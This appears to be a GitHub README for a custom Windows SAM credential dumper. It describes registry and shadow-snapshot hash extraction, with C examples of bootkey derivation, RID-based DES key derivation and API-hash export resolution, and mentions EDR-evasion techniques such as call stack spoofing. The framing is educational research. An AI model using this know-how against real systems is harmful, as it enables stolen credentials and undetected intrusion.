This project is intended strictly for cybersecurity education and authorized security research. It may only be used in environments where you have clear, prior, and explicit permission to perform credential and SAM-related testing, such as systems you own or systems covered by a valid authorization agreement.
By no means may this project be used against any system, account, network, or data without prior authorization. Unauthorized use is prohibited and may violate applicable laws, policies, and professional ethics. Users are solely responsible for ensuring that every use of this project is lawful, permitted, and properly scoped.
WhatAboutSAM is my custom Windows SAM dumper. It can read SAM material directly from the live registry or from offline hives exposed through a Shadow Snapshot. The live registry method needs SYSTEM privileges, because the default ACL on the SAM hive keys denies even administrators; the Shadow Snapshot method only needs an elevated administrator context, because it reads the SAM and SYSTEM hives from a VSS snapshot instead of the live registry.

I wanted to study, at a low level, how Windows stores local user credentials in the Security Account Manager (SAM). As a Cybersecurity Engineer with a mostly offensive mindset, I have used the tools we all know many times: mimikatz, secretsdump (impacket), pwdump, hashdump (metasploit), crackmapexec (`--sam` parameter), LaZagne...

I also wanted to practice some malware development techniques (enumerated below) and needed an excuse for it. That is why I decided to implement my own SAM dumper.
It is currently in development.
Please take a look at the credits: without those projects this would not have been possible.
- Live registry method (`-r`, `--registry`): reads the protected SAM and SYSTEM registry material through native `ntdll` calls. This method needs SYSTEM privileges.
- Shadow Snapshot method (`-ss`, `--shadowSnapshot`): creates a VSS snapshot of `C:\`, reads `Windows\System32\Config\SAM` and `Windows\System32\Config\SYSTEM` from the snapshot, and parses the offline hives with `Offreg.dll`. This method needs administrator privileges, not SYSTEM privileges.
- NTLM hash recovery: extracts local user records, derives the bootkey/syskey material, and prints NTLM hashes for local accounts.
- SAM format handling: supports the post-Windows 10 1909 AES-based path and includes the legacy RC4-based path, which still needs more testing.
- Native API resolution: walks the PEB and uses API hashing to resolve `ntdll` exports without calling `GetModuleHandle` or `GetProcAddress`.
- Optional call stack spoofing path (`-cc`, `--customCallback`): proxies selected native calls through custom callbacks.
- Debug output (`-d`, `--debug`): prints detailed acquisition and decryption traces for development and research.
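The two key-derivation steps that every SAM dumper performs before it can touch a hash are worth seeing in code: assembling the bootkey (syskey) from the `JD`, `Skew1`, `GBG` and `Data` class names under `ControlSet00X\Control\Lsa`, and deriving the pair of DES keys from a user's RID (MS-SAMR 2.2.11.1.2 and 2.2.11.1.3) that unwrap the 16-byte hash at the end of both the RC4 and the AES path. The following C is an added example written for this README, not WhatAboutSAM's own code; the permutation table is the publicly documented one used by mimikatz and secretsdump, the class-name strings in `main` are constructed sample values (already converted from UTF-16LE), and the function names are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Permutation applied to the 16 bytes recovered from the four Lsa class
 * names (JD, Skew1, GBG, Data). Same table as the public SAM dumpers. */
static const uint8_t BOOTKEY_PERM[16] = {
    0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3,
    0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7
};

static int hexval(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Build the 16-byte bootkey from the four class-name strings. Each class
 * name is 8 hex characters (4 bytes). Returns 0 on success, -1 if a string
 * is malformed, which on a real hive usually means the wrong ControlSet. */
int sam_bootkey(const char *jd, const char *skew1, const char *gbg,
                const char *data, uint8_t out[16]) {
    const char *parts[4] = { jd, skew1, gbg, data };
    uint8_t scrambled[16];
    for (int p = 0; p < 4; p++) {
        if (strlen(parts[p]) != 8) return -1;
        for (int i = 0; i < 4; i++) {
            int hi = hexval(parts[p][2 * i]), lo = hexval(parts[p][2 * i + 1]);
            if (hi < 0 || lo < 0) return -1;
            scrambled[p * 4 + i] = (uint8_t)((hi << 4) | lo);
        }
    }
    for (int i = 0; i < 16; i++) out[i] = scrambled[BOOTKEY_PERM[i]];
    return 0;
}

/* MS-SAMR 2.2.11.1.2: spread a 7-byte key over 8 bytes, leaving the low
 * (parity) bit of every byte clear so DES accepts it. */
static void des_expand_key(const uint8_t in[7], uint8_t out[8]) {
    out[0] = in[0] >> 1;
    out[1] = (uint8_t)(((in[0] & 0x01) << 6) | (in[1] >> 2));
    out[2] = (uint8_t)(((in[1] & 0x03) << 5) | (in[2] >> 3));
    out[3] = (uint8_t)(((in[2] & 0x07) << 4) | (in[3] >> 4));
    out[4] = (uint8_t)(((in[3] & 0x0F) << 3) | (in[4] >> 5));
    out[5] = (uint8_t)(((in[4] & 0x1F) << 2) | (in[5] >> 6));
    out[6] = (uint8_t)(((in[5] & 0x3F) << 1) | (in[6] >> 7));
    out[7] = in[6] & 0x7F;
    for (int i = 0; i < 8; i++) out[i] = (uint8_t)((out[i] << 1) & 0xFE);
}

/* MS-SAMR 2.2.11.1.3: the two DES keys that unwrap a user's obfuscated
 * 16-byte hash (one key per 8-byte half) depend only on the RID, stored
 * little-endian. This step is shared by the RC4 and the AES path. */
void sam_rid_to_des_keys(uint32_t rid, uint8_t key1[8], uint8_t key2[8]) {
    uint8_t r[4] = { (uint8_t)rid, (uint8_t)(rid >> 8),
                     (uint8_t)(rid >> 16), (uint8_t)(rid >> 24) };
    uint8_t k1[7] = { r[0], r[1], r[2], r[3], r[0], r[1], r[2] };
    uint8_t k2[7] = { r[3], r[0], r[1], r[2], r[3], r[0], r[1] };
    des_expand_key(k1, key1);
    des_expand_key(k2, key2);
}

static void print_hex(const char *label, const uint8_t *b, size_t n) {
    printf("%s", label);
    for (size_t i = 0; i < n; i++) printf("%02X", b[i]);
    printf("\n");
}

int main(void) {
    /* Constructed class-name values; a real hive yields different strings. */
    uint8_t bootkey[16], k1[8], k2[8];
    if (sam_bootkey("00010203", "04050607", "08090a0b", "0c0d0e0f", bootkey) != 0) {
        fprintf(stderr, "malformed Lsa class names\n");
        return 1;
    }
    print_hex("bootkey        : ", bootkey, 16);
    sam_rid_to_des_keys(500, k1, k2);  /* built-in Administrator RID */
    print_hex("RID 500 DES key1: ", k1, 8);
    print_hex("RID 500 DES key2: ", k2, 8);
    return 0;
}
```

The bootkey is only an intermediate: the hashed bootkey is obtained from it and the `SAM\Domains\Account` `F` value (MD5+RC4 on the legacy path, AES-128-CBC on the newer one), and only then are the per-user DES keys above applied. A wrong ControlSet or a mistyped permutation produces garbage that still "decrypts", so checking the class-name parsing, as the `-1` return does, is the first thing to verify when hashes look random.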
- PEB walking (avoiding `GetModuleHandle` + `GetProcAddress`)
- Call Stack Spoofing with Custom Callbacks (Thread Pools)
- Native Functions
- API Hashing
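How PEB walking and API hashing fit together: the loader never stores the string `"NtOpenKey"`, only a 32-bit hash of it, and compares that against the hash of every name in the module's export table found through `PEB -> Ldr -> InMemoryOrderModuleList -> IMAGE_EXPORT_DIRECTORY`. The C below is an added example for this README, not WhatAboutSAM's code: it uses the classic ROR13 hash rather than the project's own (see the HashCalculator link in the credits), and stands in a constructed array of export names for the real `AddressOfNames` table so it runs off Windows. Function and table names are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Illustrative API hash: ROR13 over the export name (Metasploit block_api
 * style). Case-sensitive, so "NtOpenKey" and "ntopenkey" differ. */
uint32_t api_hash_ror13(const char *name) {
    uint32_t h = 0;
    for (const unsigned char *p = (const unsigned char *)name; *p; p++) {
        h = (h >> 13) | (h << 19);   /* rotate right by 13 on 32 bits */
        h += *p;
    }
    return h;
}

/* Constructed stand-in for ntdll's export-name table. A real resolver
 * reads IMAGE_EXPORT_DIRECTORY.AddressOfNames from the image base found
 * in the PEB loader list; the names are embedded here to run anywhere. */
static const char *FAKE_NTDLL_EXPORTS[] = {
    "NtClose", "NtOpenKey", "NtQueryValueKey", "NtEnumerateKey",
    "RtlInitUnicodeString", "NtQueryKey",
};
#define FAKE_EXPORT_COUNT (sizeof(FAKE_NTDLL_EXPORTS) / sizeof(FAKE_NTDLL_EXPORTS[0]))

/* Resolve an export by hash the way a PEB-walking loader does. Returns the
 * index into the name table (used to reach AddressOfNameOrdinals and then
 * AddressOfFunctions in a real image) or -1 if no export matches. */
int resolve_by_hash(uint32_t target, const char *const *names, size_t count) {
    for (size_t i = 0; i < count; i++)
        if (api_hash_ror13(names[i]) == target) return (int)i;
    return -1;
}

/* Build-time check a practitioner wants: two exports with the same hash
 * would make the resolver silently return the first one. */
int has_collision(const char *const *names, size_t count) {
    for (size_t i = 0; i < count; i++)
        for (size_t j = i + 1; j < count; j++)
            if (api_hash_ror13(names[i]) == api_hash_ror13(names[j])) return 1;
    return 0;
}

int main(void) {
    /* In a real loader this constant is precomputed and the string is absent. */
    uint32_t target = api_hash_ror13("NtOpenKey");
    int idx = resolve_by_hash(target, FAKE_NTDLL_EXPORTS, FAKE_EXPORT_COUNT);
    printf("hash 0x%08X -> export index %d (%s)\n", target, idx,
           idx >= 0 ? FAKE_NTDLL_EXPORTS[idx] : "not found");
    printf("table collision-free: %s\n",
           has_collision(FAKE_NTDLL_EXPORTS, FAKE_EXPORT_COUNT) ? "no" : "yes");
    return 0;
}
```

Run the collision check over the full export list of the target `ntdll` build before hard-coding hashes; ROR13 is fast but has no collision resistance, which is also why detection tooling can match known hash constants in a binary as easily as it matches import names.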
- Travis CI (finally done with GitHub Actions)
- Debug branch vs release branch
- Shadow Snapshot method
- Test old algorithm. What a bummer: Microsoft changed the SAM storage format in Windows 10 1909
- Command Line Parameters
- Add more comments :)
- Debug prints
- Add optional SYSTEM elevation for the live registry method
Please take a look at these projects; without them I could not have developed WhatAboutSAM.
- https://github.com/Maldev-Academy/MaldevAcademyLdr.1/tree/main/HashCalculator
- https://github.com/tobiohlala/NTLMX
- https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/
- https://0xdarkvortex.dev/hiding-in-plainsight/
- https://0xpat.github.io/Malware_development_part_4/
- https://github.com/gentilkiwi/mimikatz
- https://www.ired.team/miscellaneous-reversing-forensics/aes-encryption-example-using-cryptopp-.lib-in-visual-studio-c++
- https://cryptopp.com/docs/ref/
- https://github.com/ShiftMediaProject/VSNASM
- I believe I did not forget any; if I did, I will add it later :P